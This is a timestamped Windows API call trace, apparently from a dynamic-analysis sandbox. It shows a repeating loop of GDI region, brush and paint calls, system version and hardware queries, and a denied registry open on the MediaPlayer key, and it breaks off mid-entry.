[0088.206] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041044 [0088.206] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041045 [0088.206] CombineRgn (hrgnDst=0x1041044, hrgnSrc1=0x900401cd, hrgnSrc2=0x8e0401d0, iMode=1) returned 1 [0088.206] CombineRgn (hrgnDst=0x1041045, hrgnSrc1=0x900401cd, hrgnSrc2=0x8e0401d0, iMode=4) returned 2 [0088.206] CreateSolidBrush (color=0xff) returned 0x2101043 [0088.206] CreateSolidBrush (color=0xff0000) returned 0x1101046 [0088.206] DeleteObject (ho=0x1101046) returned 1 [0088.206] DeleteObject (ho=0x8e0401d0) returned 1 [0088.206] DeleteObject (ho=0x900401cd) returned 1 [0088.206] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.206] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.206] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.206] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.206] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.206] BeginPath (hdc=0x0) returned 0 [0088.206] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.206] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.206] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.206] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.206] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.206] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.206] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.206] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.207] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8f0401d0 [0088.207] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x910401cd [0088.207] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041047 [0088.207] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041048 [0088.207] CombineRgn (hrgnDst=0x1041047, hrgnSrc1=0x8f0401d0, hrgnSrc2=0x910401cd, iMode=1) returned 1 [0088.207] CombineRgn (hrgnDst=0x1041048, hrgnSrc1=0x8f0401d0, hrgnSrc2=0x910401cd, iMode=4) returned 2 [0088.207] CreateSolidBrush (color=0xff) returned 0x2101046 [0088.207] CreateSolidBrush (color=0xff0000) returned 0x1101049 [0088.207] DeleteObject (ho=0x1101049) returned 1 [0088.207] DeleteObject (ho=0x910401cd) returned 1 [0088.207] DeleteObject (ho=0x8f0401d0) returned 1 [0088.207] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.207] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.207] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.207] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.207] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.207] BeginPath (hdc=0x0) returned 0 [0088.207] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.207] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.207] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.207] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.207] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.207] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.207] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.207] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.207] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x920401cd [0088.207] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x900401d0 [0088.207] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104104a [0088.207] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104104b [0088.207] CombineRgn (hrgnDst=0x104104a, hrgnSrc1=0x920401cd, hrgnSrc2=0x900401d0, iMode=1) returned 1 [0088.207] CombineRgn (hrgnDst=0x104104b, hrgnSrc1=0x920401cd, hrgnSrc2=0x900401d0, iMode=4) returned 2 [0088.207] CreateSolidBrush (color=0xff) returned 0x2101049 [0088.207] CreateSolidBrush (color=0xff0000) returned 0x110104c [0088.207] DeleteObject (ho=0x110104c) returned 1 [0088.207] DeleteObject (ho=0x900401d0) returned 1 [0088.207] DeleteObject (ho=0x920401cd) returned 1 [0088.207] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.207] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.208] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.208] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.208] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.208] BeginPath (hdc=0x0) returned 0 [0088.208] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.208] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.208] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.208] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.208] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.208] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.208] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.208] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.208] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x910401d0 [0088.208] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x930401cd [0088.208] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104104d [0088.208] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104104e [0088.208] CombineRgn (hrgnDst=0x104104d, hrgnSrc1=0x910401d0, hrgnSrc2=0x930401cd, iMode=1) returned 1 [0088.208] CombineRgn (hrgnDst=0x104104e, hrgnSrc1=0x910401d0, hrgnSrc2=0x930401cd, iMode=4) returned 2 [0088.208] CreateSolidBrush (color=0xff) returned 0x210104c [0088.208] CreateSolidBrush (color=0xff0000) returned 0x110104f [0088.208] DeleteObject (ho=0x110104f) returned 1 [0088.208] DeleteObject (ho=0x930401cd) returned 1 [0088.208] DeleteObject (ho=0x910401d0) returned 1 [0088.208] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.208] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.208] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.208] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.208] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.208] BeginPath (hdc=0x0) returned 0 [0088.208] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.208] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.208] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.208] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.208] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.208] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.208] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.208] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.208] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x940401cd [0088.209] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x920401d0 [0088.209] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041050 [0088.209] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041051 [0088.209] CombineRgn (hrgnDst=0x1041050, hrgnSrc1=0x940401cd, hrgnSrc2=0x920401d0, iMode=1) returned 1 [0088.209] CombineRgn (hrgnDst=0x1041051, hrgnSrc1=0x940401cd, hrgnSrc2=0x920401d0, iMode=4) returned 2 [0088.209] CreateSolidBrush (color=0xff) returned 0x210104f [0088.209] CreateSolidBrush (color=0xff0000) returned 0x1101052 [0088.209] DeleteObject (ho=0x1101052) returned 1 [0088.209] DeleteObject (ho=0x920401d0) returned 1 [0088.209] DeleteObject (ho=0x940401cd) returned 1 [0088.209] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.209] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.209] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.209] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.209] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.209] BeginPath (hdc=0x0) returned 0 [0088.209] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.209] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.209] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.209] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.209] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.209] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.209] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.209] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.209] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x930401d0 [0088.209] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x950401cd [0088.209] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041053 [0088.209] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041054 [0088.209] CombineRgn (hrgnDst=0x1041053, hrgnSrc1=0x930401d0, hrgnSrc2=0x950401cd, iMode=1) returned 1 [0088.209] CombineRgn (hrgnDst=0x1041054, hrgnSrc1=0x930401d0, hrgnSrc2=0x950401cd, iMode=4) returned 2 [0088.209] CreateSolidBrush (color=0xff) returned 0x2101052 [0088.209] CreateSolidBrush (color=0xff0000) returned 0x1101055 [0088.209] DeleteObject (ho=0x1101055) returned 1 [0088.209] DeleteObject (ho=0x950401cd) returned 1 [0088.209] DeleteObject (ho=0x930401d0) returned 1 [0088.209] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.209] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.209] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.209] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.209] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.209] BeginPath (hdc=0x0) returned 0 [0088.209] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.210] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.210] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.210] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.210] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.210] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.210] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.210] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.210] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x960401cd [0088.210] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x940401d0 [0088.210] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041056 [0088.210] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041057 [0088.210] CombineRgn (hrgnDst=0x1041056, hrgnSrc1=0x960401cd, hrgnSrc2=0x940401d0, iMode=1) returned 1 [0088.210] CombineRgn (hrgnDst=0x1041057, hrgnSrc1=0x960401cd, hrgnSrc2=0x940401d0, iMode=4) returned 2 [0088.210] CreateSolidBrush (color=0xff) returned 0x2101055 [0088.210] CreateSolidBrush (color=0xff0000) returned 0x1101058 [0088.210] DeleteObject (ho=0x1101058) returned 1 [0088.210] DeleteObject (ho=0x940401d0) returned 1 [0088.210] DeleteObject (ho=0x960401cd) returned 1 [0088.210] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.210] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.210] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.210] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.210] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.210] BeginPath (hdc=0x0) returned 0 [0088.210] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.210] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.210] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.210] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.210] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.210] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.210] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.210] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.210] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x950401d0 [0088.210] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x970401cd [0088.210] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041059 [0088.210] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104105a [0088.210] CombineRgn (hrgnDst=0x1041059, hrgnSrc1=0x950401d0, hrgnSrc2=0x970401cd, iMode=1) returned 1 [0088.210] CombineRgn (hrgnDst=0x104105a, hrgnSrc1=0x950401d0, hrgnSrc2=0x970401cd, iMode=4) returned 2 [0088.210] CreateSolidBrush (color=0xff) returned 0x2101058 [0088.211] CreateSolidBrush (color=0xff0000) returned 0x110105b [0088.211] DeleteObject (ho=0x110105b) returned 1 [0088.211] DeleteObject (ho=0x970401cd) returned 1 [0088.211] DeleteObject (ho=0x950401d0) returned 1 [0088.211] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.211] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.211] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.211] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.211] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.211] BeginPath (hdc=0x0) returned 0 [0088.211] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.211] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.211] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.211] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.211] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.211] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.211] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.211] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.211] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x980401cd [0088.211] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x960401d0 [0088.211] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104105c [0088.211] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104105d [0088.211] CombineRgn (hrgnDst=0x104105c, hrgnSrc1=0x980401cd, hrgnSrc2=0x960401d0, iMode=1) returned 1 [0088.211] CombineRgn (hrgnDst=0x104105d, hrgnSrc1=0x980401cd, hrgnSrc2=0x960401d0, iMode=4) returned 2 [0088.211] CreateSolidBrush (color=0xff) returned 0x210105b [0088.211] CreateSolidBrush (color=0xff0000) returned 0x110105e [0088.211] DeleteObject (ho=0x110105e) returned 1 [0088.211] DeleteObject (ho=0x960401d0) returned 1 [0088.211] DeleteObject (ho=0x980401cd) returned 1 [0088.211] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.211] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.211] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.211] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.211] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.211] BeginPath (hdc=0x0) returned 0 [0088.211] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.211] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.211] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.211] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.211] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.211] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.212] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.212] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.212] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x970401d0 [0088.212] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x990401cd [0088.212] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104105f [0088.212] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041060 [0088.212] CombineRgn (hrgnDst=0x104105f, hrgnSrc1=0x970401d0, hrgnSrc2=0x990401cd, iMode=1) returned 1 [0088.212] CombineRgn (hrgnDst=0x1041060, hrgnSrc1=0x970401d0, hrgnSrc2=0x990401cd, iMode=4) returned 2 [0088.212] CreateSolidBrush (color=0xff) returned 0x210105e [0088.212] CreateSolidBrush (color=0xff0000) returned 0x1101061 [0088.212] DeleteObject (ho=0x1101061) returned 1 [0088.212] DeleteObject (ho=0x990401cd) returned 1 [0088.212] DeleteObject (ho=0x970401d0) returned 1 [0088.212] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.212] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, 